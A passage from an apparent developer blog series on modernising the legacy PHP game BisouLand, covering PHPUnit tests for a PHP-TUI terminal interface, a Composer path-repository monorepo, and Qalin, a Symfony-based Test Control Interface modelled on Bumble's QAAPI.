✔ It fails when hotkey is empty (`['' => 'TabA']` given)
✔ It fails when hotkey is more than one character (`['ab' => 'TabA']` given)
✔ It has focusedHotkey: first one by default (e.g. `1` for `TabA`)
✔ It has focusedHotkey: can switch to another one (e.g. `focus('2')` for `TabB`)
✔ It fails when focusing on non existing hotkey (e.g. `focus('4')`)
✔ It has default style: hotkey in blue bold
✔ It has default style: focusedLabel in yellow bold
✔ It has default style: unfocusedLabels in dark gray
✔ It can customize style: hotkey
✔ It can customize style: focusedLabel
✔ It can customize style: unfocusedLabels
HotkeyTabsComponentTest covers event handling and the build() snapshot:
#[TestDox("It reports ComponentState::Changed when pressing another tab's hotkey")]
public function test_it_reports_changed_when_pressing_another_tabs_hotkey(): void
{
$tabs = HotkeyTabsComponent::fromTabs(HotkeyFixtureTab::cases());
$tab = HotkeyFixtureTab::TabB;
$componentState = $tabs->handle(CharKeyEvent::new($tab->key()));
$this->assertSame(ComponentState::Changed, $componentState);
$this->assertSame($tab, $tabs->isFocused());
}
#[DataProvider('ignoredEventsProvider')]
#[TestDox('It reports ComponentState::Ignored when $scenario')]
public function test_it_reports_ignored(string $scenario, Event $event): void
{
$tabs = HotkeyTabsComponent::fromTabs(HotkeyFixtureTab::cases());
$componentState = $tabs->handle($event);
$this->assertSame(ComponentState::Ignored, $componentState);
$this->assertSame(HotkeyFixtureTab::TabA, $tabs->isFocused());
}
public static function ignoredEventsProvider(): \Generator
{
yield [
'scenario' => 'pressing an unregistered hotkey',
'event' => CharKeyEvent::new('x'),
];
yield [
'scenario' => 'receiving a non CharKeyEvent (e.g. KeyCode::Tab)',
'event' => CodedKeyEvent::new(KeyCode::Tab),
];
}
make phpunit arg='--testdox --order-by=default --filter HotkeyTabsComponentTest'
Hotkey Tabs Component (Bl\Qa\Tests\Qalin\Spec\Infrastructure\PhpTui\Component\HotkeyTab\HotkeyTabsComponent)
✔ It builds HotkeyTabsWidget snapshotting current tabs and focused hotkey
✔ It reports ComponentState::Changed when pressing another tab's hotkey
✔ It reports ComponentState::Handled when pressing the focused tab's hotkey
✔ It reports ComponentState::Ignored when pressing an unregistered hotkey
✔ It reports ComponentState::Ignored when receiving a non CharKeyEvent (e.g. KeyCode::Tab)
No mocks. No test doubles. Just events and assertions.
Beat uses ClockInterface, so MockClock from symfony/clock lets us freeze and
advance time to land on any frame.
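The freeze-and-advance mechanic looks roughly like this (a sketch assuming the Beat API shown in the tests below; MockClock is the real class from symfony/clock):

```php
use Symfony\Component\Clock\MockClock;

$clock = new MockClock('2024-01-01 00:00:00'); // time is frozen here
$beat = new Beat($clock);
$beat->animate(); // frame 1

$clock->sleep(0.151); // advance 151 ms instantly, no real waiting
$beat->animate(); // frame 2
```

Because MockClock only moves when told to, each frame boundary can be hit deterministically, however short the animation interval is.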
Each frame test is parameterised with a data provider that yields one timing entry and
one entry per logo line. #[TestDox] interpolates $scenario from the provider to
produce a descriptive name for each case:
#[DataProvider('frame1Provider')]
#[TestDox('It renders frame 1: $scenario')]
public function test_it_renders_logo_frame_1(
string $scenario,
int $index,
string $line,
): void {
$mockClock = new MockClock('2024-01-01 00:00:00');
$beat = new Beat($mockClock);
$beat->animate();
$this->assertSame($line, $beat->logo()[$index]);
$this->assertEquals(Style::default()->fg(AnsiColor::Magenta), $beat->logoStyle());
}
public static function frame1Provider(): \Generator
{
$lines = Beat::CONTRACTED_LOGO;
yield [
'scenario' => 'at t=0s: contracted logo, in magenta',
'index' => 0,
'line' => $lines[0],
];
foreach ($lines as $index => $line) {
yield [
'scenario' => "`{$line}`",
'index' => $index,
'line' => $line,
];
}
}
make phpunit arg='--testdox --order-by=default --filter BeatTest'
Beat (Bl\Qa\Tests\Qalin\Spec\UserInterface\Tui\QalinAnimatedBanner\Beat)
✔ It renders frame 0: before animate(): default logo, in red
✔ It renders frame 0: ` ████ ████ `
✔ It renders frame 0: `████████ ████████`
✔ It renders frame 0: `██████████████████`
✔ It renders frame 0: `██████████████████`
✔ It renders frame 0: ` ████████████ `
✔ It renders frame 0: ` ██████ `
✔ It renders frame 1: at t=0s: contracted logo, in magenta
✔ It renders frame 1: ` `
✔ It renders frame 1: ` ████ ████ `
✔ It renders frame 1: ` ████████████ `
✔ It renders frame 1: ` ████████ `
✔ It renders frame 1: ` ████ `
✔ It renders frame 1: ` `
✔ It renders frame 2: at t=0.151s: default logo, in red
...
✔ It renders frame 4: at t=1.0s: default logo, in red
...
Each line of the logo is asserted individually. If the contracted logo shifts a pixel, the failing test name tells you exactly which line broke and at which frame.
Screen tests exercise the full Symfony container and real HTTP client. They drive the screen by sending the same events a user would: character keys, tab presses, enter.
Required and invalid input cases are covered with data providers:
#[DataProvider('invalidInputProvider')]
#[TestDox('It fails when $scenario')]
public function test_it_fails_on_invalid_input(string $scenario, bool $preCreate, array $input): void
{
if ($preCreate) {
TestKernelSingleton::get()->actionRunner()->run(
new SignUpNewPlayer($input['username'], PasswordPlainFixture::makeString()),
);
}
$screen = TestKernelSingleton::get()->container()->get(UpgradeInstantlyForFreeScreen::class);
foreach (str_split($input['username']) as $char) {
$screen->handle(CharKeyEvent::new($char));
}
$screen->handle(CodedKeyEvent::new(KeyCode::Tab)); // username -> upgradable
foreach (str_split($input['upgradable_filter']) as $char) {
$screen->handle(CharKeyEvent::new($char));
}
$screen->handle(CodedKeyEvent::new(KeyCode::Tab)); // upgradable -> levels
if ('' !== $input['levels_override']) {
$screen->handle(CodedKeyEvent::new(KeyCode::Backspace)); // clear default '1'
foreach (str_split($input['levels_override']) as $char) {
$screen->handle(CharKeyEvent::new($char));
}
}
$screen->handle(CodedKeyEvent::new(KeyCode::Tab)); // levels -> Upgrade
$result = $screen->handle(CodedKeyEvent::new(KeyCode::Enter)); // submit
$this->assertInstanceOf(Stay::class, $result);
}
public static function invalidInputProvider(): \Iterator
{
yield [
'scenario' => 'invalid username',
'preCreate' => false,
'input' => ['username' => 'x', 'upgradable_filter' => '', 'levels_override' => ''],
];
yield [
'scenario' => 'invalid upgradable (ChoiceField: valid choices only)',
'preCreate' => true,
'input' => ['username' => UsernameFixture::makeString(), 'upgradable_filter' => 'zzz', 'levels_override' => ''],
];
yield [
'scenario' => 'invalid levels',
'preCreate' => true,
'input' => ['username' => UsernameFixture::makeString(), 'upgradable_filter' => '', 'levels_override' => '-1'],
];
}
The test arranges game state through Qalin's ActionRunner (the same one used by
the testsuite interface described in the previous article), then drives the TUI screen
purely through events. The terminal is never involved.
make phpunit arg='--testdox --order-by=default --filter UpgradeInstantlyForFreeScreenTest'
Upgrade Instantly For Free Screen (Bl\Qa\Tests\Qalin\Integration\UserInterface\Tui\Action\UpgradeInstantlyForFreeScreen)
✔ It upgrades instantly for free
✔ It has levels as an optional field (defaults to 1)
✔ It has levels as an optional field (set to 2)
✔ It has username as a required field
✔ It has upgradable as a required field
✔ It fails when invalid username
✔ It fails when invalid upgradable (ChoiceField: valid choices only)
✔ It fails when invalid levels
✔ It reports Navigate to HomeScreen when pressing Esc
🤔 Retrospective: the screen integration tests send real HTTP requests to a live Qalin server at
localhost:8080 (configured via QALIN_BASE_URI in .env.test). That means running them requires the server to be up. It is consistent with the TUI's own design (the TUI calls the HTTP API rather than handlers in-process), but it makes the tests heavier than they need to be. A MockHttpClient from Symfony would remove the server dependency and make the tests faster and self-contained.
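Such a setup could look like this (a sketch using Symfony's real MockHttpClient and MockResponse classes; the response body shape is a hypothetical stand-in for Qalin's actual payloads):

```php
use Symfony\Component\HttpClient\MockHttpClient;
use Symfony\Component\HttpClient\Response\MockResponse;

// Queue canned responses in the order the screen will request them.
$client = new MockHttpClient([
    new MockResponse('{"player":{"username":"Petrus"}}', ['http_code' => 200]),
]);
// Inject $client wherever the screen's HttpClientInterface is wired,
// e.g. via the test container, and no live server is needed.
```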
PHP-TUI brings the Ratatui model to PHP: a retained-mode widget system, a constraint-based layout engine, and a clean event/render loop.
The architecture maps naturally to how we think about screens:
- Screen::build() constructs a widget tree from current state: pure data, called every frame
- Screen::handle() processes one event and returns a navigation signal

What surprised me is how little PHP-TUI requires. There is no framework to learn, no lifecycle to manage.
DisplayBuilder, Widget, WidgetRenderer, and a handful of layout types
cover everything. The rest is just PHP.
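A minimal screen following that build()/handle() split might look like this (WelcomeScreen and the Stay signal are hypothetical names from this article's tests; the widget classes are my assumption of PHP-TUI's core extension):

```php
use PhpTui\Tui\Extension\Core\Widget\ParagraphWidget;
use PhpTui\Tui\Widget\Widget;

final class WelcomeScreen
{
    // Pure function of current state, called every frame.
    public function build(): Widget
    {
        return ParagraphWidget::fromString('Welcome to Qalin');
    }

    // One event in, one navigation signal out.
    public function handle(object $event): object
    {
        return new Stay(); // e.g. remain on this screen
    }
}
```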
After a couple of days, I'm delighted to say that this is now my favourite Qalin UI. My geek honour is therefore saved 😼.
Want to learn more?
In this series, we're dealing with it as it is: a big ball of mud, a spaghetti code base written by a student learning web development from online tutorials.
So far, we have:
The XSS fix introduced clean domain objects (Account, AuthToken) and PDO PostgreSQL
adapters. Qalin, the modern Symfony application built alongside the monolith,
depends on those same objects to create test scenarios.
Now we have two applications and ten packages. That is where a monorepo comes in.
Adding Qalin turned a single-application repository into something bigger: two apps and a growing set of shared packages.
In a multi-repository setup, each package lives in its own repository: its own checkout, its own CI pipeline, its own version tag, its own Packagist entry.
Changing an interface that touches two packages means committing to one repository, tagging a release, then bumping the constraint and committing in the other. A change that touches one line of an interface requires three commits across three repositories before you can test whether it compiles.
Cross-cutting tools face the same problem. A single PHPStan rule change
means updating ten phpstan.neon.dist files, one per package.
A monorepo solves this by putting everything in one place.
The root of the repository has two directories:
bisouland/
├── apps/
│ ├── monolith/ ← the 2005 LAMP app
│ └── qa/ ← Qalin (Symfony 8)
└── packages/
├── bl-auth/
├── bl-auth-bundle/
├── bl-auth-pdopg/
├── bl-auth-tests/
├── bl-exception/
├── bl-exception-bundle/
├── bl-game/
├── bl-game-bundle/
├── bl-game-pdopg/
└── bl-game-tests/
There is no root composer.json. Each application and each package manages its own
dependencies independently. What connects them is Composer's built-in support for
local path repositories.
When Composer resolves a package, it normally fetches it from Packagist.
But packages do not have to be published to be used.
Composer supports a path repository type that points to a local directory:
{
"repositories": [
{"type": "path", "url": "../../packages/*"}
]
}
The * glob means every subdirectory under packages/ is a potential package.
When you run composer install, Composer reads each subdirectory's composer.json,
finds the declared name, and makes it available as if it had been fetched from Packagist.
Here is the monolith's (app) composer.json:
{
"name": "bl/monolith",
"type": "project",
"repositories": [
{"type": "path", "url": "../../packages/*"}
],
"require": {
"php": ">=8.5",
"bl/auth": "*@dev",
"bl/auth-pdopg": "*@dev",
"bl/exception": "*@dev",
"ext-curl": "*",
"ext-pdo_pgsql": "*",
"symfony/uid": "^8.0"
}
}
The version constraint *@dev means "any version, at development stability".
Composer symlinks the local directory into vendor/ rather than copying it,
so edits to the package source are immediately reflected without a composer update.
Packages can also depend on each other.
bl/auth depends on bl/exception, and declares its own path repository pointing upstream:
{
"name": "bl/auth",
"type": "library",
"repositories": [
{"type": "path", "url": "../*"}
],
"require": {
"php": ">=8.5",
"bl/exception": "*@dev",
"symfony/uid": "^8.0"
},
"autoload": {
"psr-4": {"Bl\\Auth\\": "src/"}
}
}
The ten packages form a layered dependency graph. Each layer has a clear responsibility:
| Suffix | Responsibility |
|---|---|
| (none) | Domain model: interfaces, value objects, entities |
| -pdopg | Infrastructure: PDO PostgreSQL implementations |
| -bundle | Infrastructure: Symfony integration (service wiring) |
| -tests | Package unit tests and shared fixtures (builders, factories) |
The domain packages (bl-auth, bl-game) are framework-agnostic.
They declare interfaces and value objects but hold no framework dependency
beyond symfony/uid for UUID generation.
The infrastructure packages implement the domain interfaces using PDO. The application never depends on the implementation directly; it depends on the interface and relies on the Symfony bundle to provide the binding:
// packages/bl-auth-bundle/src/BlAuthBundle.php
final class BlAuthBundle extends AbstractBundle
{
public function loadExtension(array $config, ContainerConfigurator $container, ContainerBuilder $builder): void
{
$container->services()
->set(PdoPgSaveAuthToken::class)->autowire()->autoconfigure()
->alias(SaveAuthToken::class, PdoPgSaveAuthToken::class);
}
}
SaveAuthToken is the domain interface. PdoPgSaveAuthToken is the PDO implementation.
The bundle connects them.
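On the consuming side, a service type-hints only the interface; the alias registered by the bundle resolves it. A sketch (IssueAuthToken and the save() method name are hypothetical; the wiring pattern is the one shown above):

```php
// Depends on the SaveAuthToken domain interface only; the bundle's
// alias autowires it to PdoPgSaveAuthToken at runtime.
final readonly class IssueAuthToken
{
    public function __construct(
        private SaveAuthToken $saveAuthToken,
    ) {
    }

    public function issue(AuthToken $authToken): void
    {
        $this->saveAuthToken->save($authToken); // hypothetical method name
    }
}
```

Swapping the persistence layer later would mean a new implementation package and a one-line alias change in the bundle, with no change to consumers.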
🤔 Retrospective: back in 2016, when I explored MonoRepos with the Mars Rover series, one thing I was wondering about was whether Symfony's autowiring would play nicely with bundles living in local path-repository packages.
It does 🎉. Composer symlinks the package into
vendor/, Symfony finds the bundle through the normal discovery mechanism, and autowiring resolves across package boundaries without any extra configuration.
The test packages serve a dual purpose. They contain the package's own unit
tests, which PHPUnit discovers via the packages-spec suite in apps/qa.
They also expose builders and factories that other packages and applications
can import as test dependencies.
bl/auth-tests for example provides AccountFixture, a static factory that
assembles a valid Account with randomised defaults and optional overrides:
// packages/bl-auth-tests/src/Fixtures/AccountFixture.php
final readonly class AccountFixture
{
public static function make(
?AccountId $accountId = null,
?Username $username = null,
?PasswordHash $passwordHash = null,
): Account {
return new Account(
accountId: $accountId ?? AccountIdFixture::make(),
username: $username ?? UsernameFixture::make(),
passwordHash: $passwordHash ?? PasswordHashFixture::make(),
);
}
}
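In a test, the fixture reads like this (a usage sketch; the Petrus override value is illustrative):

```php
// With no arguments, every field is randomised:
$account = AccountFixture::make();

// Named arguments pin down only what the test cares about:
$account = AccountFixture::make(
    username: Username::fromString('Petrus'),
);
```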
bl/game-tests follows the same pattern, providing PlayerFixture and its value-object
companions. A unit test in the QA application can pull fixtures from both packages
without any setup duplication:
// apps/qa/tests/Qalin/Spec/Application/Action/SignUpNewPlayerHandlerTest.php
use Bl\Auth\Tests\Fixtures\Account\PasswordPlainFixture;
use Bl\Auth\Tests\Fixtures\Account\UsernameFixture;
use Bl\Game\Tests\Fixtures\PlayerFixture;
public function test_it_signs_up_a_new_player_for_a_given_username_and_password(): void
{
$username = UsernameFixture::makeString();
$passwordPlain = PasswordPlainFixture::makeString();
$expectedPlayer = PlayerFixture::make();
// ...
}
Code quality is enforced from a single place: the QA application.
apps/qa/composer.json lists all packages in require and all tools in require-dev:
{
"name": "bl/qa",
"type": "project",
"repositories": [
{"type": "path", "url": "../../packages/*"}
],
"require": {
"php": ">=8.5",
"ext-curl": "*",
"ext-pdo_pgsql": "*",
"bl/auth": "*@dev",
"bl/auth-bundle": "*@dev",
"bl/auth-pdopg": "*@dev",
"bl/exception": "*@dev",
"bl/exception-bundle": "*@dev",
"bl/game": "*@dev",
"bl/game-bundle": "*@dev",
"bl/game-pdopg": "*@dev",
"phpspec/prophecy-phpunit": "^2.5",
"symfony/console": "^8.0.4",
"symfony/framework-bundle": "^8.0.5",
"symfony/monolog-bundle": "^4.0.1",
"symfony/property-access": "^8.0.4",
"symfony/property-info": "^8.0.5",
"symfony/routing": "^8.0.4",
"symfony/runtime": "^8.0.1",
"symfony/serializer": "^8.0.5",
"symfony/twig-bundle": "^8.0.4",
"symfony/uid": "^8.0.4",
"symfony/yaml": "^8.0.1"
},
"require-dev": {
"bl/auth-tests": "*@dev",
"bl/game-tests": "*@dev",
"friendsofphp/php-cs-fixer": "^3.94.1",
"jangregor/phpstan-prophecy": "^2.3",
"phpstan/phpstan": "^2.1.39",
"phpunit/phpunit": "^13",
"rector/rector": "^2.3.7",
"rector/swiss-knife": "^2.3.5",
"symfony/dotenv": "^8.0",
"symfony/http-client": "^8.0.5",
"symfony/maker-bundle": "^1.66"
},
"config": {
"allow-plugins": {
"symfony/runtime": true
},
"bump-after-update": true,
"sort-packages": true
}
}
Each tool is configured to scan everything: all apps (QA, monolith) and all packages.
PHPStan analyses them all at once:
# apps/qa/phpstan.neon.dist
includes:
- phpstan-baseline.neon
- vendor/jangregor/phpstan-prophecy/extension.neon
parameters:
level: 10
paths:
- src/
- tests/
- ../monolith/src/
- ../../packages/
excludePaths:
- templates/maker/
bootstrapFiles:
- vendor/autoload.php
- ../monolith/vendor/autoload.php
# legacy code is in phpincludes/, not src/ - baseline is empty
PHP CS Fixer scans the same three locations, but unlike PHPStan it reaches
into phpincludes/. Two legacy files that break the indentation rule are
excluded, and declare_strict_types is disabled: CS Fixer would apply it
blindly to every file, including the legacy ones where it causes fatal errors:
// apps/qa/.php-cs-fixer.dist.php
$finder = (new PhpCsFixer\Finder())
->in([
__DIR__,
__DIR__.'/../monolith',
__DIR__.'/../../packages',
])
->exclude(['var'])
->notPath([
'phpincludes/bisous.php',
'phpincludes/cerveau.php',
])
;
return (new PhpCsFixer\Config())
->setRules([
// ...
'declare_strict_types' => false, // would break legacy phpincludes/
// ...
])
// ...
;
Rector covers the same paths and applies the TYPE_DECLARATION set, which
includes adding declare(strict_types=1). Unlike CS Fixer, Rector analyses
each file before modifying it and only applies the transformation where it is
safe to do so; legacy files in phpincludes/ that would break are left alone:
// apps/qa/rector.php
return RectorConfig::configure()
->withPaths([
__DIR__,
__DIR__.'/../monolith',
__DIR__.'/../../packages',
])
->withSkip([
__DIR__.'/../monolith/vendor',
__DIR__.'/../../packages/*/vendor',
// ...
])
->withSets([
SetList::PHP_85,
SetList::TYPE_DECLARATION, // adds declare(strict_types=1) where safe
// ...
]);
PHPUnit organises tests into named suites covering all packages and both apps:
<!-- apps/qa/phpunit.xml.dist -->
<testsuites>
<testsuite name="packages-spec">
<directory>../../packages</directory>
</testsuite>
<testsuite name="qalin-spec">
<directory>tests/spec</directory>
</testsuite>
<testsuite name="qalin-integration">
<directory>tests/integration</directory>
</testsuite>
<testsuite name="monolith-smoke">
<directory>tests/monolith/smoke</directory>
</testsuite>
<testsuite name="monolith-end-to-end">
<directory>tests/monolith/end-to-end</directory>
</testsuite>
</testsuites>
Running make phpunit from the QA application executes every package spec,
every Qalin test, and every monolith integration test in one command.
We can select a specific subset of tests, using PHPUnit's options:
make phpunit arg='--testsuite qalin-spec,qalin-integration --filter Handler'
Each application has its own compose.yaml. The QA application mounts the
packages directory and the monolith source as Docker volumes:
# apps/qa/compose.yaml (excerpt)
services:
app:
volumes:
- ../../packages:/packages
- ../monolith:/apps/monolith
- bisouland-monolith_vendor:/apps/monolith/vendor
networks:
- bisouland-monolith_default
ports:
- "43010:8080"
Mounting the monolith's vendor from the monolith's own named volume
avoids duplicating the dependency installation.
The monolith must be started before the QA application so the named volume exists.
The root apps-init target enforces this order: it runs the monolith's app-init
before QA's, so the volume is always present by the time QA's containers start.
The QA application joins the monolith's Docker network (bisouland-monolith_default),
which allows the integration and end-to-end test suites to send real HTTP requests
to the monolith container using its internal hostname.
| Port | Service |
|---|---|
| 43000 | Monolith (web) |
| 43001 | Monolith (DB) |
| 43010 | Qalin (web) |
Port assignments follow a convention: the 43 prefix is inspired by the game itself ("love" has 4 letters, "you" has 3), the next two digits identify the application (00 for monolith, 01 for QA), and the last digit identifies the service (0 for the web server, 1 for the database).
A root Makefile ties everything together with two targets:
# Makefile
apps-init:
@$(MAKE) -C apps/monolith app-init
@$(MAKE) -C apps/qa app-init
apps-qa:
@$(MAKE) -C apps/qa app-qa
make apps-init bootstraps both applications in the correct order.
make apps-qa runs the full quality pipeline from the QA application,
which in turn runs code style checks, static analysis, refactoring validation,
and all test suites:
# apps/qa/Makefile (excerpt)
app-qa: composer-dump cs-check phpstan rector-check phpunit
One command covers the entire codebase. No CI configuration file is required: whatever runs locally is what would run in any future CI environment.
A monorepo is not without cost.
Coupling risk: packages sharing a repository make it easy to skip proper
interfaces. A shortcut that imports an internal implementation directly rather
than going through the declared interface is one file away instead of one
repository away. The package graph above enforces discipline by design,
but nothing in the tooling prevents a careless use statement.
No granular access control: a contributor with read access to the repository can see every application and every package. For BisouLand this is not a concern, but it would matter in a team where different members should see different parts of the system.
Synchronised upgrades: upgrading a shared dependency or the PHP version requires every package and application to be updated at once. There is no gradual rollout across repositories; the whole monorepo moves together. For a small project this is an advantage as much as a cost, but in a large codebase with many packages it can turn a routine upgrade into a significant coordinated effort.
Repository growth: every application, package, vendor directory (as
bind-mount or volume), and test fixture lives in the same history. git clone
and git log grow with the full project. For a project of this size the
impact is negligible; at the scale of a large organisation it is not.
For BisouLand, a single-team project where all packages are internal, none of these tradeoffs are blocking. They are worth naming so the choice remains a deliberate one.
BisouLand started as a single PHP file importing other PHP files. After ten iterations it has two applications and ten packages.
A monorepo keeps them together without any tooling beyond what Composer already provides:
- path repositories make the local packages installable without publishing them
- *@dev constraints opt out of version pinning for in-repository packages

No monorepo-specific tooling was needed. No version synchronisation scripts. No split tooling to publish packages separately. Everything lives in one checkout, one git log, one make apps-qa.
🤔 Retrospective: this approach works well as long as all packages remain internal to the project. The moment one needs to be published to Packagist for external consumption, path repositories and
*@devconstraints are no longer sufficient. Tools such assymplify/monorepo-builderor GitHub Actions with a split workflow automate publishing each package to its own repository. For BisouLand, that day has not come.
Want to learn more?
- this article's approach: per-package composer.json files, path repositories linking them
- pmu, a Composer plugin that discovers the composer.json files in subdirectories and wires their dependencies, removing the need to declare path repositories by hand; pmu require symfony/uid adds the constraint to every composer.json that needs it in a single command
The app was built by a student while learning xHTML, CSS, PHP and MySQL from online tutorials. Maintaining this big ball of mud / spaghetti code can be a real challenge!
In today's article, we'll explore how to improve Developer eXperience in such a hostile environment, by creating a modern Symfony application next to it.
This is the idea behind a Test Control Interface: a dedicated tool that lets anyone on the team (developers, QA, designers, product, etc) reach any application state on demand, without touching production code, without direct database access, and without waiting for time gates.
Want to verify that blowing a Smooch works? To do that you need to have built one first.
To build a Smooch, you need your Mouth at level 6. Here is what each upgrade costs and how long it takes for them to complete:
| Mouth level | Cost to next level | Completion time |
|---|---|---|
| 1 | 299 | 1 s |
| 5 | 1,478 | 22 min 28 s |
But to pay for those upgrades you need Love Points (LP). Your Heart generates them over time. The higher its level, the more it produces per hour:
| Heart level | LP generated / hr | Cost to next level | Completion time |
|---|---|---|---|
| 1 | 14 | 150 | 1 s |
| 5 | 1,657 | 739 | 1 hr 11 min |
| 10 | 3,019 | 5,460 | 8 hr 50 min |
Starting fresh with 300 LP, here is the full breakdown:
| Upgrade | Cost | Waiting for LP | Waiting for completion |
|---|---|---|---|
| Heart 1→2 | 150 | 0s | 1s |
| Heart 2→3 | 223 | 16m 0s | 11s |
| Heart 3→4 | 333 | 26m 45s | 5m 0s |
| Heart 4→5 | 496 | 21m 12s | 26m 24s |
| Heart 5→6 | 739 | 7m 12s | 1h 11m |
| Heart 6→7 | 1,103 | 0s | 2h 19m |
| Heart 7→8 | 1,645 | 0s | 3h 44m |
| Heart 8→9 | 2,454 | 0s | 5h 21m |
| Heart 9→10 | 3,660 | 0s | 7h 4m |
| Mouth 1→2 | 299 | 0s | 1s |
| Mouth 2→3 | 446 | 0s | 1s |
| Mouth 3→4 | 665 | 0s | 49s |
| Mouth 4→5 | 991 | 0s | 6m 27s |
| Mouth 5→6 | 1,478 | 0s | 22m 28s |
| Total | 15,182 | 1h 11m | 20h 43m |
Nearly a day of watching completion timers tick. And once you finally can build that Smooch, you still cannot blow it: players need 50 Score Points first, which means more grinding (1,000 Love Points spent = 1 Score Point earned).
The classic developer hacks are familiar:
You need a controlled, shareable way to reach any predetermined state instantly.
In 2021, Sergey Ryabko described API for QA: Testing features when you have no access to code, the Test Control Interface built at Bumble Inc, the dating app. The tool is called QAAPI.
The core idea: rather than touching the database directly or bending production code to fit a test scenario, you expose a dedicated set of controlled operations via HTTP. A web UI built on top gives everyone on the team (developers, QA, designers, product) a friendly way to check, demo, or test the app.
Consider a promotional banner: three days after registration, show the user a discounted premium upsell. To test it, you would normally register an account and wait three days. To avoid that, a QAAPI method offsets the registration date for a specific test user:
/SetPromoTimeOffset?seconds=20&userid=12345
And 20 seconds after registration, user 12345 sees the banner.
Its implementation is a self-contained class with three elements:
a description, typed parameters, and a run() method with the logic:
class SetPromoTimeOffset extends \QAAPI\Methods\AbstractMethod
{
public function getDescription(): string
{
return <<<Description
Sets a time offset in seconds between the user's registration date and the promo showing
Description;
}
public function getParamsConfig(): array
{
return [
'user_id' => \QAAPI\Params\UserId::create(),
'seconds' => \QAAPI\Params\PositiveInteger::create()
->setDescription('Offset in seconds'),
];
}
public function run(): \QAAPI\Models\Output
{
// logic here
return \QAAPI\Models\Output::success();
}
}
Documentation is generated automatically from those definitions.
Security is layered to make broad access safe: network-level (VPN only), authentication (Google OAuth for engineers, secret token for automated tests), and data-level (methods only operate on flagged test users, never real ones).
Beyond raw methods, QAAPI also has Scenarios: combinations of methods written ad-hoc in Lua that reproduce a complete feature flow in one call, acting as living documentation of complex flows.
At Bumble, QAAPI has grown to over 1,500 methods and has been in use since 2013.
In an earlier article (2019), Vladimir Yants described
A monolithic architecture for our clients' hundreds of versions: how we write and support tests,
showing QAAPI used programmatically inside automated API tests: three calls to set up a
test user's profession, A/B test group, and registration date, then assert on the server
response. The article also details their test user pool (pre-registered users with an
is_test_user flag, restored to a clean state after each test) and how that flag lets them
run the same API tests against a pre-production cluster with real data, while keeping test
users isolated from real ones.
✏️ Edit: Artem Soldatkin rightly points out that the first version of QAAPI was authored by Ilya Ageev and created at Badoo in 2013, before Bumble existed and before Badoo was incorporated into Bumble Inc.
A Test Control Interface is a deceptively simple idea whose implementation cost is low, yet it makes everyone on the team faster and transforms how they work.
Simple enough that I built a working prototype for BisouLand in two weeks.
Qalin (pronounced câlin) stands for Quality Assurance Local Interface Nudger.
It is BisouLand's Test Control Interface, built on top of Symfony 8 with PHP 8.5.
It follows the same concept as QAAPI, with a few differences suited to the Symfony ecosystem: input is a separate readonly DTO rather than a method on the class, dependencies are injected via the constructor rather than inherited from a base class, and the handler is wired through Symfony's service container.
Qalin runs alongside the app in local, dev, test, and staging environments. It is never deployed to production.
Actions are atomic operations. Each one has three parts: an input DTO, a handler, and an output DTO.
The input DTO is a readonly class with typed public properties.
Constructor promotion keeps it concise:
final readonly class UpgradeInstantlyForFree
{
public function __construct(
public string $username,
public string $upgradable,
public int $levels = 1,
) {
}
}
The handler receives the input DTO, validates it, calls domain services, and returns an output DTO:
final readonly class UpgradeInstantlyForFreeHandler
{
public function __construct(
private ApplyCompletedUpgrade $applyCompletedUpgrade,
private FindPlayer $findPlayer,
) {
}
public function run(UpgradeInstantlyForFree $input): UpgradeInstantlyForFreed
{
$username = Username::fromString($input->username);
$upgradable = Upgradable::fromString($input->upgradable);
if ($input->levels < 1) {
throw ValidationFailedException::make(
"Invalid \"UpgradeInstantlyForFree\" parameter: it should have levels >= 1 (`{$input->levels}` given)",
);
}
$player = $this->findPlayer->find($username);
for ($i = 0; $i < $input->levels; ++$i) {
$upgradable->checkPrerequisites($player->upgradableLevels);
$milliScore = $upgradable->computeCost($player->upgradableLevels);
$player = $this->applyCompletedUpgrade->apply($username, $upgradable, $milliScore);
}
return new UpgradeInstantlyForFreed($player);
}
}
Notice what is absent: no cost deduction, no completion timer. The action reaches directly into the domain service that applies a completed upgrade and calls it in a loop. That is the point.
Scenarios are handlers that compose other handlers.
Instead of inheriting from a base class,
they receive action handlers as constructor dependencies
and call their run() methods in sequence:
final readonly class SignInNewPlayerHandler
{
public function __construct(
private SignUpNewPlayerHandler $signUpNewPlayerHandler,
private SignInPlayerHandler $signInPlayerHandler,
) {
}
public function run(SignInNewPlayer $input): SignedInNewPlayer
{
$signedUp = $this->signUpNewPlayerHandler->run(
new SignUpNewPlayer($input->username, $input->password),
);
$signedIn = $this->signInPlayerHandler->run(
new SignInPlayer($signedUp->player->account->username->toString()),
);
return new SignedInNewPlayer($signedUp, $signedIn);
}
}
SignInNewPlayer signs up a brand-new player and immediately signs them in,
returning their session cookie in one call. No curl, no browser, no waiting.
🤔 Retrospective:
SignInNewPlayer was the smallest scenario I could build to close the two-week spike. It composes two actions and covers a real need, but it does not yet showcase the full value of scenarios. A more representative example would be UnlockLeap: to test cloud-leaping, a player needs Leap at level 1, which requires Legs at level 2, which requires Heart at level 15. The scenario would call upgrade-instantly-for-free on each upgradable in order, dropping the player straight into a state where the leap feature can be exercised. That kind of scenario is what a Test Control Interface is really for.
For developers who live in the terminal, the same actions and scenarios are available as
Symfony console commands. Modern Symfony Console attributes eliminate all of the
traditional configure() / execute() scaffolding:
#[AsCommand(
name: 'action:upgrade-instantly-for-free',
description: 'Instantly upgrade for free',
)]
final readonly class UpgradeInstantlyForFreeCommand
{
public function __construct(
private UpgradeInstantlyForFreeHandler $upgradeInstantlyForFreeHandler,
) {
}
public function __invoke(
#[Argument(description: 'an existing one')]
string $username,
#[Argument(description: 'an Organ (e.g. heart), Bisou (e.g. smooch) or Technique (e.g. hold_breath)')]
string $upgradable,
SymfonyStyle $io,
#[Option(description: 'how many levels to upgrade at once')]
int $levels = 1,
): int {
try {
$upgradeInstantlyForFreed = $this->upgradeInstantlyForFreeHandler->run(
new UpgradeInstantlyForFree($username, $upgradable, $levels),
);
} catch (ValidationFailedException $e) {
$io->error($e->getMessage());
return Command::INVALID;
} catch (ServerErrorException $e) {
$io->error($e->getMessage());
return Command::FAILURE;
}
$io->success('Successfully completed Upgrade Instantly For Free');
$rows = [];
foreach ($upgradeInstantlyForFreed->toArray() as $field => $value) {
$rows[] = [$field, $value];
}
$table = new Table($io);
$table->setStyle('markdown');
$table->setHeaders(['Field', 'Value']);
$table->setRows($rows);
$table->render();
return Command::SUCCESS;
}
}
🎶 Modern Symfony:
